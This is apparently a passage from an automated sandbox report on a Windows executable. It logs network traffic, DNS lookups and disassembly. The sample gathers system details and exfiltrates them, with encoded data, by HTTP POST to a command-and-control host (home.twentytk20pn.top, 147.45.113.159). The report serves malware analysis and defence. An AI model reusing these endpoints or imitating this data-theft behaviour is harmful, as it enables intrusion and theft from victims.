Dec 20, 2024 16:56:58.101042986 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101053953 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101135015 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101145029 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101201057 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101211071 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101281881 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101294041 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101382971 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101392984 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101433039 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101495981 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101505995 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101540089 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101636887 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101645947 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101730108 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101824045 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101833105 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101841927 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101908922 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101918936 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.101984978 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.102132082 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.102142096 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.102216005 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.102226019 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.102235079 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:58.126831055 CET	80	49721	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:59.046063900 CET	49723	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:59.165806055 CET	80	49723	147.45.113.159	192.168.2.5
Dec 20, 2024 16:56:59.165884972 CET	49723	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:59.166218996 CET	49723	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:56:59.285903931 CET	80	49723	147.45.113.159	192.168.2.5
Dec 20, 2024 16:57:00.562238932 CET	80	49723	147.45.113.159	192.168.2.5
Dec 20, 2024 16:57:00.562825918 CET	80	49723	147.45.113.159	192.168.2.5
Dec 20, 2024 16:57:00.563107967 CET	49723	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:57:00.563107967 CET	49723	80	192.168.2.5	147.45.113.159
Dec 20, 2024 16:57:00.682609081 CET	80	49723	147.45.113.159	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:56:52.270704985 CET	62260	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:56:52.270986080 CET	62260	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:56:52.409703016 CET	53	62260	1.1.1.1	192.168.2.5
Dec 20, 2024 16:56:52.409718990 CET	53	62260	1.1.1.1	192.168.2.5
Dec 20, 2024 16:56:56.024889946 CET	63029	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:56:56.024949074 CET	63029	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:56:56.163674116 CET	53	63029	1.1.1.1	192.168.2.5
Dec 20, 2024 16:56:56.432740927 CET	53	63029	1.1.1.1	192.168.2.5
Dec 20, 2024 16:56:58.907273054 CET	49261	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:56:58.907354116 CET	49261	53	192.168.2.5	1.1.1.1
Dec 20, 2024 16:56:59.045219898 CET	53	49261	1.1.1.1	192.168.2.5
Dec 20, 2024 16:56:59.045234919 CET	53	49261	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 20, 2024 16:56:52.270704985 CET	192.168.2.5	1.1.1.1	0xdc6d	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:56:52.270986080 CET	192.168.2.5	1.1.1.1	0x3081	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 20, 2024 16:56:56.024889946 CET	192.168.2.5	1.1.1.1	0xdbcf	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:56:56.024949074 CET	192.168.2.5	1.1.1.1	0xb3f2	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false
Dec 20, 2024 16:56:58.907273054 CET	192.168.2.5	1.1.1.1	0x905c	Standard query (0)	home.twentytk20pn.top	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:56:58.907354116 CET	192.168.2.5	1.1.1.1	0x1173	Standard query (0)	home.twentytk20pn.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 16:56:52.409703016 CET	1.1.1.1	192.168.2.5	0xdc6d	No error (0)	httpbin.org	98.85.100.80	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:56:52.409703016 CET	1.1.1.1	192.168.2.5	0xdc6d	No error (0)	httpbin.org	34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:56:56.163674116 CET	1.1.1.1	192.168.2.5	0xdbcf	No error (0)	home.twentytk20pn.top	147.45.113.159	A (IP address)	IN (0x0001)	false
Dec 20, 2024 16:56:59.045219898 CET	1.1.1.1	192.168.2.5	0x905c	No error (0)	home.twentytk20pn.top	147.45.113.159	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.twentytk20pn.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49721	147.45.113.159	80	4676	C:\Users\user\Desktop\EMasovlyrQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:56:56.554996967 CET	12360	OUT	POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: / Content-Type: application/json Content-Length: 501024 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 32 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710213", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:56:56.674714088 CET	2472	OUT	Data Raw: 57 7a 78 52 57 38 69 5c 2f 61 4c 68 5a 33 6e 58 79 46 67 5c 2f 50 5c 2f 45 7a 78 49 79 50 77 71 34 57 72 63 58 63 51 34 54 4e 73 5a 6c 74 48 47 34 50 41 79 6f 5a 4e 51 77 65 49 78 7a 72 59 32 63 71 64 4b 55 61 65 4f 78 32 58 55 48 54 69 34 74 31 Data Ascii: WzxRW8i\/aLhZ3nXyFg\/P\/EzxIyPwq4WrcXcQ4TNsZltHG4PAyoZNQweIxzrY2cqdKUaeOx2XUHTi4t1G8SpJW5YTeh+p+EXhRxH40cZUOB+F8bkuAzWvl+PzGGIz\/E47C5cqGX04VK0JVcuy7NcSqsozSpRWEcJNPnnBav8dKK\/rDb\/AIIz\/sb5IDfFwckceOtO\/wDZvCxqq\/8AwRo\/Y7wCJ\/i+Mg9PHOk9t397w
Dec 20, 2024 16:56:56.674846888 CET	4944	OUT	Data Raw: 2f 4a 37 44 46 42 58 5c 2f 4c 6e 5c 2f 41 4c 64 4b 6b 6a 65 5a 76 2b 63 50 2b 39 5c 2f 35 5a 41 31 48 75 64 6c 32 5a 5c 2f 7a 39 66 38 5c 2f 6e 54 5c 2f 37 5c 2f 41 4d 6e 79 5a 36 2b 62 36 39 5c 2f 35 5c 2f 77 41 36 5a 5c 2f 63 66 5a 6e 39 37 35 Data Ascii: /J7DFBX\/Ln\/ALdKkjeZv+cP+9\/5ZA1Hudl2Z\/z9f8\/nT\/7\/AMnyZ6+b69\/5\/wA6Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v\/AC0H4fXrTPn+V\/8AXOf9b\/n\/AD2qXnO\/95\/nn7V\/X\/69NkjPyfPhx\/n86ie3z\/Rm9Pr8v1IfM3Ns\/jP\/ADzP+uz\/AJ9feoambfIXj7SfX9z9Ov8AntzTOu
Dec 20, 2024 16:56:56.674866915 CET	2472	OUT	Data Raw: 76 42 2b 43 34 76 7a 44 41 2b 78 34 54 6f 34 54 43 34 57 72 67 71 57 4e 78 55 50 72 46 62 68 79 64 4b 6c 58 6f 34 61 63 38 77 65 43 71 31 35 59 71 6e 6c 53 2b 76 31 4c 34 65 4c 71 75 58 57 64 62 38 59 36 39 38 59 50 44 32 6e 36 33 34 56 5c 2f 61 Data Ascii: vB+C4vzDA+x4To4TC4WrgqWNxUPrFbhydKlXo4ac8weCq15YqnlS+v1L4eLquXWdb8Y698YPD2n634V\/a1\/Z0j+PfjKbQNKutQX9inxP4HPjXwx8HNc8SNFdtoPj34zePdPk1TwN8HdR8uaPTp9GGqWcEMrac2oea\/8APd\/wUb8DWvw4\/a0+IPhO11S71z7Jp\/g\/UbvWtQ03w5pWo6rf+IPC2leIL68v7Twpovh7Q\/t
Dec 20, 2024 16:56:56.674947023 CET	2472	OUT	Data Raw: 55 39 6f 5c 2f 76 44 5c 2f 50 34 30 79 72 46 52 62 44 37 66 35 5c 2f 43 72 4f 77 67 6b 37 66 6a 5c 2f 53 6f 4f 37 5c 2f 51 66 79 71 30 79 35 34 50 42 46 51 73 75 4f 44 79 44 51 41 78 5c 2f 75 6e 38 50 35 69 6d 50 31 5c 2f 44 2b 70 71 57 6d 73 75 Data Ascii: U9o\/vD\/P40yrFRbD7f5\/CrOwgk7fj\/SoO7\/Qfyq0y54PBFQsuODyDQAx\/un8P5imP1\/D+pqWmsu7HbFBpT6\/IhqHn7nv\/AJ\/Dv+tTUzb8+\/2x\/n+dBoRVXqxRQdBXpj9Px\/oafSMC355oOgg\/i29\/064qLYfb\/P4VK\/8ArD\/uj+lFAFeo\/L9\/0\/8Ar1Zfp+P9DUVB1Uun+H\/Iqv8AdP4fzFQt8uc9
Dec 20, 2024 16:56:56.675126076 CET	2472	OUT	Data Raw: 2f 4c 38 66 36 64 75 30 30 6b 6e 79 34 2b 34 6e 6d 34 5c 2f 36 62 39 76 39 46 37 63 66 35 78 54 4a 47 5c 2f 76 70 76 38 41 2b 57 33 37 76 5c 2f 6c 6a 5c 2f 77 44 72 71 66 61 2b 63 76 36 2b 5a 30 45 4c 66 64 66 66 38 69 66 39 63 76 33 5c 2f 41 50 Data Ascii: /L8f6du00kny4+4nm4\/6b9v9F7cf5xTJG\/vpv8A+W37v\/lj\/wDrqfa+cv6+Z0ELfdff8if9cv3\/APn6n9aZ5n3On\/f3r\/n+Rqfa\/wBxz8\/m\/vffjvVXa8ihP3e2T\/ln5XkHn9eefbmqAfJ+7ZM+Yj2+ZYo5ZcdB360eW7R\/c34i82KPzf3\/ANnHtwP\/AK\/6B2x70f8A55eV\/XH+eaPnP3Ek\/wBb5tr6fln
Dec 20, 2024 16:56:56.675170898 CET	2472	OUT	Data Raw: 66 4f 30 6b 30 30 72 53 79 79 4e 73 38 4c 4e 6c 6e 5a 6d 59 2b 35 4e 66 38 53 6b 50 43 72 78 61 38 52 36 75 5a 34 48 67 44 77 77 38 52 65 4f 73 58 77 33 6a 61 56 4c 69 50 44 63 48 63 45 38 53 38 54 56 2b 48 36 2b 49 57 4c 6f 34 57 68 6e 64 48 4a Data Ascii: fO0k00rSyyNs8LNlnZmY+5Nf8SkPCrxa8R6uZ4HgDww8ReOsXw3jaVLiPDcHcE8S8TV+H6+IWLo4WhndHJctx1TKa+LqYLMKeFpY6FCdeeX46NJSlhayh\/wBkmaeKHhfwDQyvGcceJHAPBmF4iw1Wrw\/iOK+MOHuHaOe4fDrCVcVXyarnGY4OnmdHDUsdgamIq4KVeFGGPwcqklHE0XP9A9GfiMnJ6Y9ehz\/KvwL\/AOClHg
Dec 20, 2024 16:56:56.675291061 CET	4944	OUT	Data Raw: 32 6d 66 68 6c 62 44 77 78 38 41 76 38 41 67 70 4c 38 5a 66 41 66 77 33 73 67 73 4f 67 2b 45 50 69 42 38 4e 76 43 5c 2f 77 41 5a 4c 33 51 4c 47 48 4b 32 75 6d 36 5a 34 67 31 6a 78 4a 34 64 53 7a 30 32 30 69 49 69 68 73 4e 4f 30 58 54 37 52 56 56 Data Ascii: 2mfhlbDwx8Av8AgpL8ZfAfw3sgsOg+EPiB8NvC\/wAZL3QLGHK2um6Z4g1jxJ4dSz020iIihsNO0XT7RVVSsK7RXqnwI\/4J2eCvhx8SrT47\/Gj4n\/EL9qb49aaqJoHj\/wCLN2JtK8GeX5jJJ4G8Gi51Cy0CeN5pJLSW41HVv7Ik2TaAukXBuJrj8Zx3GWTVsqybL+KPFLBcbcLcN18rxuB4UyLg3M8j4l4jqZFhZYPIcv4o
Dec 20, 2024 16:56:56.676379919 CET	2472	OUT	Data Raw: 6c 68 4d 64 68 4b 38 65 71 71 34 62 45 78 71 30 61 73 62 50 61 63 4a 4c 58 7a 50 45 79 76 47 63 52 5a 42 6a 61 4f 61 35 4a 69 73 36 79 58 4d 63 4c 4a 53 77 2b 5a 5a 58 57 78 32 58 59 33 44 7a 62 56 6e 52 78 6d 45 6c 52 72 30 5a 4e 38 74 6e 43 70 Data Ascii: lhMdhK8eqq4bExq0asbPacJLXzPEyvGcRZBjaOa5Jis6yXMcLJSw+ZZXWx2XY3DzbVnRxmElRr0ZN8tnCpFt2t0Ptbwz+2n8WtE06fStWuo\/ElhPayWzJeyCObDoUD\/aJ4L9o\/LzlYrVbWEAbTGRt2+GeKPiz4w8WvKt\/qdxFYyFsafHM0FoFPRXhgEMExAO0SSQ78Zy2Wbd5NoGpaT4p8ZfD\/wAB6J4h8Lt4h+JfxB8F\
Dec 20, 2024 16:56:56.794569016 CET	7416	OUT	Data Raw: 35 5a 52 78 61 78 4e 46 7a 7a 61 4b 71 61 5a 4f 2b 72 5c 2f 45 44 77 72 38 4e 37 4c 56 5c 2f 43 44 36 39 34 79 2b 41 74 6c 2b 30 5a 6f 39 32 2b 76 61 73 75 6a 78 5c 2f 44 32 5c 2f 2b 41 6c 31 2b 30 64 62 78 61 68 63 72 34 59 65 39 67 38 51 48 34 Data Ascii: 5ZRxaxNFzzaKqaZO+r\/EDwr8N7LV\/CD694y+Atl+0Zo92+vasujx\/D2\/+Al1+0dbxahcr4Ye9g8QH4e2kkb2Vtp15pi688NoustprPq8ed4a1+z8UaDpniDTjmy1W2W6tjuD5jZmUfMAAeVPIAr6TIuNOFeJsTWweQ55gc0xWHwdLMK9DCzlKpSwVfHY\/LaWInGUI2hPH5XmGF\/mVbCVYySsr\/H8TeHnG3BuFwuN4o4b
Dec 20, 2024 16:56:56.794718027 CET	2472	OUT	Data Raw: 4d 30 6a 70 6e 41 6b 6b 5c 2f 31 63 66 5c 2f 41 43 78 2b 6e 2b 65 66 71 4b 5a 49 79 66 50 38 6e 5c 2f 54 4b 58 5c 2f 44 36 2b 5c 2f 4a 71 66 5a 2b 66 34 66 38 41 42 4f 67 72 53 52 75 75 31 5c 2f 33 6a 78 39 4f 66 77 39 50 78 50 76 33 70 6d 31 39 Data Ascii: M0jpnAkk\/1cf\/ACx+n+efqKZIyfP8n\/TKX\/D6+\/JqfZ+f4f8ABOgrSRuu1\/3jx9Ofw9PxPv3pm19sPyFH\/wBVLJ\/7a\/y\/zxVoq\/mJv8z\/AF3\/ACzl\/cf\/AFqj2vv3v8h87yv3n\/LX+X06\/wA6PZ+f4f8ABAZ5f7uFGcun+keb+VHyBUeZ\/L\/569v9H\/z+P5USb5FdPude\/wDkc8\/hTPMfh0+z+T6+
Dec 20, 2024 16:56:57.979226112 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49723	147.45.113.159	80	4676	C:\Users\user\Desktop\EMasovlyrQ.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:56:59.166218996 CET	287	OUT	POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: / Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 20, 2024 16:57:00.562238932 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	98.85.100.80	443	4676	C:\Users\user\Desktop\EMasovlyrQ.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 15:56:54 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-20 15:56:54 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:56:54 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-20 15:56:54 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	10:56:49
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\EMasovlyrQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EMasovlyrQ.exe"
Imagebase:	0x970000
File size:	4'460'032 bytes
MD5 hash:	04869F7ACE61605035664AF9589AF21B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.5%
Total number of Nodes:	656
Total number of Limit Nodes:	105

Executed Functions

Function 009AF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

%s starting (timeout=%lldms), xrefs: 009AFCDD, 009AFEB1
Connection time-out, xrefs: 009AF2A3
%s done, xrefs: 009AF9CD, 009AFD27, 009AFF03
%s trying next, xrefs: 009AF8FE
ipv6, xrefs: 009AF3DC
created %s (timeout %lldms), xrefs: 009AF4BE, 009AF5DF
all eyeballers failed, xrefs: 009B00FF
%s assess started=%d, result=%d, xrefs: 009B0150, 009B01AE
Connected to %s (%s) port %u, xrefs: 009B0026
%s connect timeout after %lldms, move on!, xrefs: 009AFA33
connect.c, xrefs: 009AF3BB, 009AF4FA
%s connect -> %d, connected=%d, xrefs: 009AF720
ipv4, xrefs: 009AF331, 009AF34B, 009AF36C, 009AF3EC, 009AF5BB
Connection timeout after %lld ms, xrefs: 009B00AC
Failed to connect to %s port %u after %lld ms: %s, xrefs: 009B0254

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: a8f1cd9a907f0f695214794119afc25d17d987d685a672cabcc49356751fcc5a
Instruction ID: 63a2369602e853c937c93a80b05f867f68b910801bcce09ebf95a8222ad581f4
Opcode Fuzzy Hash: a8f1cd9a907f0f695214794119afc25d17d987d685a672cabcc49356751fcc5a
Instruction Fuzzy Hash: F2C2E131A043449FD724CF68C594B6AB7E5BF85314F098A6CEC989B2A2D771ED84CBC1

Function 0097255D Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00972579
GlobalMemoryStatusEx.KERNELBASE ref: 009725CC
GetDriveTypeA.KERNELBASE ref: 00972647
GetDiskFreeSpaceExA.KERNELBASE ref: 0097267E
KiUserCallbackDispatcher.NTDLL ref: 009727E2
SHGetKnownFolderPath.SHELL32 ref: 0097286D
FindFirstFileW.KERNELBASE ref: 009728F8
FindNextFileW.KERNELBASE ref: 0097291F

Strings

`, xrefs: 009729BC
@, xrefs: 009725B4

Memory Dump Source

Source File: 00000000.00000002.2255053473.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.2255031448.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000E20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F83000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255053473.0000000000F85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255597004.0000000000F88000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000000F8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001223000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.00000000012FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2255619107.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256045530.0000000001314000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256210886.00000000014CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256230665.00000000014CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256251127.00000000014CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2256272174.00000000014CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_EMasovlyrQ.jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
String ID: @$`
API String ID: 2066228396-3318628307
Opcode ID: ad9eb0b1fe2e4fc32b7ec129f2853989ae8ec83d934f48383696a11851861888
Instruction ID: 2cb2c59b93dd43f2b38be4e8720432be4215d135f24351c723b8e0e00572543a
